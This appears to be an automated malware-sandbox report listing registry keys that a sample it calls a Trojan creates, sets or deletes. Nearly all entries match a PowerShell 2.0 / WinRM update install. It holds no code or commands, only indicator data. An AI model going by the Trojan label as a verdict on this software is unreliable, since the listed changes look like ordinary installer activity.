[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ImagePath" = "%WinDir%\System32\svchost.exe -k WinRM"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.PNF" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"MaxSize" = "15728640"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 58 51 7E 82 2C B0 F9 05 94 A6 B5 81 82 B7 71"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "PSFactoryBuffer"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "PSFactoryBuffer"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"Sources" = "PowerShell"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathIISSamples" = "C:\Inetpub\iissamples"

[HKCR\AppID\{3feb2f63-0eec-4b96-84ab-da1307e0117c}]
"LaunchPermission" = "01 00 04 80 98 00 00 00 A4 00 00 00 00 00 00 00"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"MaxSize" = "20971520"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"ServiceDll" = "%SystemRoot%\system32\WsmSvc.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\1033]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathIISAdmin" = "%System%\inetsrv\iisadmin"

[HKCR\Microsoft.PowerShellScript.1\DefaultIcon]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe,1"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\VersionIndependentProgID]
"(Default)" = "WSMan.InternalAutomation"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"UpgradeType" = "0"

[HKCR\Microsoft.PowerShellData.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\v1.0\powershell_ise.exe %1"

[HKLM\System\CurrentControlSet\Services\WinRM\Parameters]
"seRVicemAIN" = "ServiceMain"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"TypesSupported" = "7"

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstalledBy" = "%CurrentUserName%"

[HKCR\Microsoft.PowerShellData.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"AppID" = "{3e5ca495-8d6a-4d1f-ad99-177b426c8b8e}"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerVersion" = "6.1.29.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayIcon" = "%System%\WindowsPowerShell\v1.0\WTRInstaller.ico"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\.psc1]
"Content Type" = "application/PowerShell"

[HKCR\Microsoft.PowerShellXmlData.1]
"EditFlags" = "131072"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}]
"(Default)" = "WSMan InternalAutomation Class"

[HKCR\Microsoft.PowerShellData.1]
"EditFlags" = "131072"

[HKCR\Microsoft.PowerShellXmlData.1]
"FriendlyTypeName" = "Windows PowerShell XML Document"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ErrorControl" = "1"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"ARPLink" = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}]
"(Default)" = "IWSManResourceLocatorInternal"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell]
"AutoBackupLogFiles" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathFTPRoot" = "C:\Inetpub\ftproot"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\ProxyStubClsid32]
"(Default)" = "{F73C1438-71B4-4D91-AD13-1F889A03AC67}"

[HKCR\WSMan.InternalAutomation\CLSID]
"(Default)" = "{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"NoRepair" = "1"

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}]
"(Default)" = "WinRM WMI Provider for User Profile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"UninstallString" = "%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WSMan.Automation.1]
"(Default)" = "WSMan Automation Class"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"RuntimeVersion" = "v2.0.50727"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}]
"(Default)" = "IWSManProvHost"

[HKCR\Microsoft.PowerShellModule.1]
"FriendlyTypeName" = "Windows PowerShell Script Module"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"(Default)" = "%System%\WSMAUTO.DLL"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageVersion" = "1.0"

[HKCR\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InprocServer32]
"ThreadingModel" = "Both"

[HKCR\Interface\{A7A1BA28-DE41-466A-AD0A-C4059EAD7428}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"ServerExecutable" = "%System%\winrshost.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"DisplayName" = "Windows Management Framework Core"
"InstallDate" = "20150716"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"Publisher" = "Microsoft Corporation"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"AllowProtectedRenames" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"ReleaseType" = "Software Update"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\NumMethods]
"(Default)" = "4"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsDelSignature"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]
"PathScripts" = "C:\Inetpub\iissamples\Scripts"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}]
"(Default)" = "IWSMan"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"PowerShellVersion" = "2.0"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}\ProgID]
"(Default)" = "WSMan.Automation.1"

[HKCR\Microsoft.PowerShellScript.1\shell\Edit\command]
"(Default)" = "%System%\WindowsPowerShell\V1.0\powershell_ise.exe %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Services\WinRM]
"DependOnGroup" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\CLSID\{BCED617B-EC03-420b-8508-977DC7A686BD}]
"(Default)" = "WSMan Automation Class"

[HKCR\Microsoft.PowerShellScript.1\shell\Open\command]
"(Default)" = "%System%\notepad.exe %1"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}]
"(Default)" = "IHost"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Publisher" = "Microsoft Corporation"

[HKCR\Interface\{190D8637-5CD3-496D-AD24-69636BB5A3B5}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKCR\Interface\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\CLSID\{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}\InprocServer32]
"(Default)" = "%System%\wsmplpxy.dll"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ApplicationBase" = "%System%\WindowsPowerShell\v1.0"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"InstallerName" = "Update.exe"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"AppID" = "{3feb2f63-0eec-4b96-84ab-da1307e0117c}"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}]
"(Default)" = "Microsoft Windows Remote Shell Host"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"PackageName" = "Windows Management Framework Core"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\Microsoft.PowerShellScript.1]
"FriendlyTypeName" = "Windows PowerShell Script"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinRM]
"Description" = "Allows access to management information from local and remote machines."

[HKCR\Interface\{FC84FC58-1286-40C4-9DA0-C8EF6EC241E0}]
"(Default)" = "IWSManSession"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"HelpLink" = "http://go.microsoft.com/fwlink/?LinkID=163790"

[HKCR\WSMan.InternalAutomation.1]
"(Default)" = "WSMan Internal Class"

[HKLM\SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930]
"Type" = "Update"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\.psm1]
"(Default)" = "Microsoft.PowerShellModule.1"

[HKCR\TypeLib\{F010BE25-296D-4036-980F-5A0669A17577}\1.0\HELPDIR]
"(Default)" = "%System%"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsVerifyHash"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"CategoryMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsCreateHash"

[HKLM\SYSTEM\LastKnownGoodRecovery\LastGood]
"INF/oem10.inf" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\Interface\{17245DB2-74E5-45F6-8843-B7AEF309B6D6}\ProxyStubClsid32]
"(Default)" = "{BA9BB214-D930-4206-8F8F-BF0F1EAA4A6B}"

[HKCR\WSMan.Automation]
"(Default)" = "WSMan Automation Class"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational]
"file" = "%systemroot%\system32\config\EventForwarding-Operational.Evt"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"

[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"

[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"

[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""

[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"

[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"

[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"

[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"

[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"

[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"

[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"

[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"

[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"

[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"

[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"

[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"

[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"

[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"

The following service will be launched automatically at system boot up:

[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\6b4:f63b8\iis]

The process %original file name%.exe:464 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 AC D5 A5 AD AE 24 E1 2A 75 8F 1C C3 45 AA C1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The process PSCustomSetupUtil.exe:3592 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 DB 48 99 A3 4A 7C 1F 9B A8 BF 7D F5 BA 32 F9"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"Path" = "C:\Perl\site\bin;C:\Perl\bin;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;c:\Program Files\Wireshark;%System%\WindowsPowerShell\v1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:2596 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 EB A4 21 A2 40 B0 73 92 D7 AD A9 47 F8 98 3D"

[HKLM\SOFTWARE\Microsoft\Fusion\References\System.Management.Automation, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL" = "7E 71 C8 CA 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "187"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "188"
"StoreChangeIDFor64BitProcesses" = "166"
"StoreChangeIDFor32BitProcesses" = "187"

The process PSCustomSetupUtil.exe:2900 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 23 1E 4A 3F 39 FF 24 5A 79 B7 7A 98 20 AD 20"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35,MSIL" = "40 8A 05 CC 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "195"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "196"
"StoreChangeIDFor64BitProcesses" = "174"
"StoreChangeIDFor32BitProcesses" = "195"

The process PSCustomSetupUtil.exe:3776 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 BA 7A F2 7F 5C E6 11 BF B3 77 39 A3 42 8D B9"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.Editor.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "208"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "209"
"Microsoft.PowerShell.Editor.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "12 5B 04 D0 6D BF D0 01"
"StoreChangeIDFor64BitProcesses" = "187"
"StoreChangeIDFor32BitProcesses" = "208"

The process PSCustomSetupUtil.exe:3612 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 E2 EA E4 A4 6A E7 07 68 F9 90 3E AF A7 20 C9"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Control\Session Manager\Environment]
"PATHEXT" = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.PSC1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process PSCustomSetupUtil.exe:3736 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 92 2F 6A BF 69 3B C6 B3 B7 56 7E E9 C9 BE 2C"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.PowerShell.GraphicalHost.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "207"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.PowerShell.GraphicalHost.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "80 5C E5 CF 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"StoreChangeID" = "208"
"StoreChangeIDFor64BitProcesses" = "186"
"StoreChangeIDFor32BitProcesses" = "207"

The process PSCustomSetupUtil.exe:3164 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 4B 18 F8 C2 2E 52 91 4D 9C F7 CD 70 C0 1C BF"

[HKLM\SOFTWARE\Microsoft\Fusion\References\Microsoft.BackgroundIntelligentTransfer.Management.resources, Version=1.0.0.0, Culture=en, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL\{2EC93463-B0C3-45E1-8364-327E96AEA856}]
"21aa23b4-dc5a-4922-9eea-adb05a250128" = "PowerShell Setup"

[HKLM\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default]
"Microsoft.BackgroundIntelligentTransfer.Management.resources,1.0.0.0,en,31bf3856ad364e35,MSIL" = "DE A5 04 CD 6D BF D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

